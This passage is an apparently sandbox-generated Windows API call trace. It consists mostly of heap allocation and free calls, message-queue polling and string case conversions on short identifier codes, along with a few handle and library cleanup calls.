(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0162.001] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0162.001] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0162.001] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0162.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0162.001] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0162.001] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.002] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.002] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0162.002] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.002] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0162.002] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0162.002] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.002] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0162.002] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.002] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0162.002] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.002] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0162.002] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.002] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0162.002] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.002] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.002] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0162.003] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.003] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0162.003] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.003] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.003] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0162.003] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.003] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0162.003] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.003] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0162.003] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.003] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0162.003] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.003] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.003] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.003] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.003] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.004] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.004] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0162.004] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.004] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0162.004] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.004] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.004] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0162.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0162.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0162.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0162.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0162.006] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.006] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0162.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0162.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.006] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.007] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0162.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0162.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0162.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.008] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0162.008] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0162.008] FreeLibrary (hLibModule=0x74d40000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0162.008] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0162.008] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0162.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.009] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0162.009] CloseHandle (hObject=0x170) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0162.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0162.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0162.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0162.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0162.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0162.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0162.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0162.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0162.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0162.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.013] CloseHandle (hObject=0x1e8) returned 1 [0162.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0162.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0162.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0162.025] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0162.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0162.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0162.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0162.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0162.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0162.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0162.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0162.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0162.026] HeapFree (in: 